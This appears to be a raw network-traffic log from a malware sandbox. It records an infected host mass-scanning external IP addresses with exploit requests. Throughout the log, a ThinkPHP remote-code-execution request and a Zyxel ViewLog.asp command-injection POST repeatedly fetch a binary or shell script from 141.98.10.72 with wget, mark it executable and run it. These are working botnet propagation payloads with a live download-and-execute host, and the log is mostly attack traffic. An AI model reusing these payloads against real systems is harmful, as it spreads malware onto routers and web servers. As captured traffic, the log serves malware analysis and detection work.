Feb 14, 2024 09:31:11.628370047 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1021	192.168.2.15	52440	112.126.92.47	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:12.841885090 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:31:13.178937912 CET	502	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 14 Feb 2024 08:31:12 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1022	192.168.2.15	37016	95.169.188.17	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:13.059075117 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:31:13.268219948 CET	404	IN	HTTP/1.1 400 Bad Request Date: Wed, 14 Feb 2024 08:31:13 GMT Server: Apache Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1023	192.168.2.15	56420	95.101.70.23	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:13.059366941 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:31:13.276622057 CET	479	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Wed, 14 Feb 2024 08:31:13 GMT Date: Wed, 14 Feb 2024 08:31:13 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 64 66 63 31 34 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 34 37 33 26 23 34 36 3b 64 63 62 63 34 65 65 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.5dfc1402.1707899473.dcbc4ee</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1024	192.168.2.15	43462	95.216.208.204	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:13.060820103 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:31:13.338419914 CET	602	IN	HTTP/1.1 400 Content-Type: text/html;charset=utf-8 Content-Language: en Content-Length: 435 Date: Wed, 14 Feb 2024 08:31:13 GMT Connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 30 20 e2 80 93 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 30 20 e2 80 93 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 400 Bad Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 Bad Request</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1025	192.168.2.15	36554	95.240.204.194	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:13.069494963 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
1026	192.168.2.15	42380	95.59.5.102	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:13.148528099 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:31:14.071121931 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:31:15.927022934 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:31:19.703172922 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:31:27.126849890 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:31:41.974438906 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:32:13.461555004 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
1027	192.168.2.15	52622	95.170.82.199	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:13.467215061 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:31:13.668632984 CET	339	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 (Ubuntu) Date: Wed, 14 Feb 2024 08:31:13 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1028	192.168.2.15	52880	95.217.16.101	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:13.514224052 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:31:13.742676020 CET	115	IN	HTTP/1.1 400 Bad Request Content-Type: text/plain; charset=utf-8 Connection: close Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: 400 Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port
1029	192.168.2.15	38446	95.83.127.154	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:13.699112892 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:31:15.090053082 CET	41	IN	HTTP/1.0 404 File Not Found
Feb 14, 2024 09:31:15.090904951 CET	215	IN	Data Raw: 53 65 72 76 65 72 3a 20 61 6c 70 68 61 70 64 0d 0a 44 61 74 65 3a 20 46 72 69 20 46 65 62 20 31 34 20 31 39 3a 35 32 3a 34 35 20 32 30 31 34 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 Data Ascii: Server: alphapdDate: Fri Feb 14 19:52:45 2014Pragma: no-cacheCache-Control: no-cacheContent-type: text/html<html><body><h2>Error: File Not Found</h2><p>File Not Found.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1030	192.168.2.15	56980	85.214.116.145	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:14.141093969 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:14.361587048 CET	1257	IN	HTTP/1.1 404 Content-Type: text/html;charset=utf-8 Content-Language: de Content-Length: 1108 Date: Wed, 14 Feb 2024 08:31:14 GMT Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 68 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 62 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 70 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 61 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 26 23 34 37 3b 63 67 69 2d 62 69 6e 26 23 34 37 3b 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 3c 70 3e 3c 62 3e 42 65 73 63 68 72 65 69 62 75 6e 67 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 39 2e 30 2e 32 37 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!doctype html><html lang="de"><head><title>HTTP Status 404 nicht gefunden</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 nicht gefunden</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> /cgi-bin/ViewLog.asp</p><p><b>Beschreibung</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/9.0.27</h3></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1031	192.168.2.15	43572	94.121.96.229	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:14.149235010 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1032	192.168.2.15	56052	94.122.64.111	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:14.152973890 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1033	192.168.2.15	59808	31.204.128.252	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:14.335724115 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:14.528786898 CET	146	IN	HTTP/1.1 307 Temporary Redirect Location: /containers/ Date: Wed, 14 Feb 2024 08:31:14 GMT Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
1034	192.168.2.15	53146	94.107.34.9	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:14.357861996 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1035	192.168.2.15	52536	31.200.34.15	8080

Timestamp	Bytes transferred	Direction	Data
